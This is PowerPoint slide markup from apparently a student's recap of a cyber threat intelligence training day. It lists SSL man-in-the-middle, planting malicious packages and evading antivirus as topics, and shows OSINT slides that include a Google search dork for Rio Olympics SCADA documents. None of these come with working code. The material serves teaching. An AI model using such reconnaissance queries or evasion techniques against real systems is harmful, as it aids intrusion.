              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="116242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0"/>
            <a:ext cx="9144000" cy="1162429"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="6000" spc="-5" dirty="0"/>
              <a:t>DAY 2</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="76200" y="1149489"/>
            <a:ext cx="9025571" cy="5632311"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" kern="0" dirty="0"/>
              <a:t>Ali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0" err="1"/>
              <a:t>Dehghantanha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0"/>
              <a:t> a Salford lecturer took us on this day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" kern="0" spc="-5" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0"/>
              <a:t>Ali was very charming and involving to watch. He filled us with lots of real life </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0" err="1"/>
              <a:t>storys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" kern="0" spc="-5" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" kern="0" spc="-5" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" kern="0" spc="-5" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Included here are some of Dr </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>Deghantanhas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> slides (I wont cover all)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Just to say, we were enlightened with how you should look at threats, exploit threats, protect yourself and take advantage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This was real Mr Robot ideals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>A number of peoples course choice was made this day.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Ultimately we covered</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	surveillance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	CTI Types</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>	and got our hands dirty</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>		SSL man in the middle</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>		Placing malicious packages on others PC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>		Hiding packages from virus checkers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>ADD THAT TONIGHT WAS PAINT BALL NIGHT – SO MUCH FUN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3327955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990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39837" y="1147825"/>
            <a:ext cx="7861934" cy="14604"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7861934" h="14605">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7861363" y="14224"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="808080"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="34290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0"/>
            <a:ext cx="9144000" cy="3429000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9144000" h="3429000">
                <a:moveTo>
                  <a:pt x="0" y="3429000"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9144000" y="3429000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9144000" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3429000"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="920432" y="145287"/>
            <a:ext cx="7303134" cy="923925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="6000" dirty="0"/>
              <a:t>Tactical </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-5" dirty="0"/>
              <a:t>Cyber</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-70" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="6000" spc="-5" dirty="0"/>
              <a:t>Threat</a:t>
            </a:r>
            <a:endParaRPr sz="6000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2364119" y="1066869"/>
            <a:ext cx="3970020" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="73660" algn="ctr">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>Intelligence</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19543672">
            <a:off x="-233234" y="2664294"/>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
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2586989" y="5793014"/>
            <a:ext cx="3970020" cy="1007968"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="0">
              <a:defRPr sz="6000" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman"/>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ts val="3765"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" dirty="0"/>
              <a:t>Ali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0" err="1"/>
              <a:t>Dehghantanha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0" err="1"/>
              <a:t>Ph.D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0"/>
              <a:t>, CISM, CCFP, CISSP, GXPN,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="20" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" dirty="0"/>
              <a:t>GREM)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1270" algn="ctr">
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0"/>
              <a:t>University </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" dirty="0"/>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0"/>
              <a:t>Salford-  Greater Manchester- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" dirty="0"/>
              <a:t>United</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="114" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0"/>
              <a:t>Kingdom</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" dirty="0"/>
              <a:t>Web:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-45" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.AliD.info</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" kern="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:spcBef>
                <a:spcPts val="720"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" dirty="0"/>
              <a:t>Email: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>AliD@AliD.info</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="75" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1200" b="0" kern="0" spc="-5" dirty="0">
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>A.Dehghantanha@salford.ac.uk</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1200" kern="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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="9113139" cy="1188500"/>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15430" y="1627395"/>
            <a:ext cx="9113139" cy="5213220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2819400"/>
            <a:ext cx="4041940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What can YOU see here that is of interest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5715000" y="3651221"/>
            <a:ext cx="2852640" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Where the cams point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Systems/OS used</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Free Laptop and are allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Dress Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Site layout</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>………….</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="65695" y="6217476"/>
            <a:ext cx="8453120" cy="560705"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="299085" marR="5080" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299085" algn="l"/>
                <a:tab pos="299720" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>International Security and Defense Systems </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>(ISDS), </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>BriefCam, the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>EROS-B </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>satellite</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-60" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>and  SayVU are </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>cyber </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>security contractors for the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-140" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-5" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>game.</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64134" y="1799767"/>
            <a:ext cx="4428871" cy="4329049"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4556569" y="1904999"/>
            <a:ext cx="4381500" cy="3048000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="313509" y="1950872"/>
            <a:ext cx="3697359" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Again more info from a different view</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>More info on setup</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19543672">
            <a:off x="-194468" y="2644169"/>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
        <p:nvSpPr>
          <p:cNvPr id="21" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64134" y="6509466"/>
            <a:ext cx="3526154" cy="286385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="299085" indent="-286385">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="299085" algn="l"/>
                <a:tab pos="299720" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Google: rio olympics scada</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" spc="-110" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1800" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ext:pdf</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="object 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15430" y="1646132"/>
            <a:ext cx="9144000" cy="1388110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2522" y="3034242"/>
            <a:ext cx="3352800" cy="3063874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 6"/>
